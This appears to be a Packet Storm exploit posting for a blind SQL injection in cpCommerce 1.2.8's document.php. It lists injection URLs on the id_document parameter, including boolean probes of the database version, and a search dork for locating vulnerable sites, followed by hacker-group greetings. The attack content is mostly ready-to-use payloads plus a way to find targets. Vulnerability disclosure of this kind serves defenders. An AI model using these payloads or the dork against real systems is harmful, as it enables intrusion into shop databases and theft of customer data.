cpCommerce version 1.2.8 suffers from a remote blind SQL injection vulnerability.
27cfa068d3abf366bb0788a9d6b15ed1283ce8b8c6eaedf874215519a9e61f79==========================================================================================
[o] cpCommerce 1.2.8 Blind SQL Injection Vulnerability
Software : cpCommerce version 1.2.8
Vendor : http://cpcommerce.cpradio.org/
Download : http://cpcommerce.cpradio.org/downloads.php
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
==========================================================================================
[o] Vulnerable file
document.php
[o] Exploit
http://localhost/[path]/document.php?id_document=[SQL]
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5
[o] Dork
"Powered by cpcommerce"
==========================================================================================
[o] Greetz
MainHack BrotherHood [ http://serverisdown.org ]
OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
Special for Vrs-hCk [ thx cuy.. :p ]
==========================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed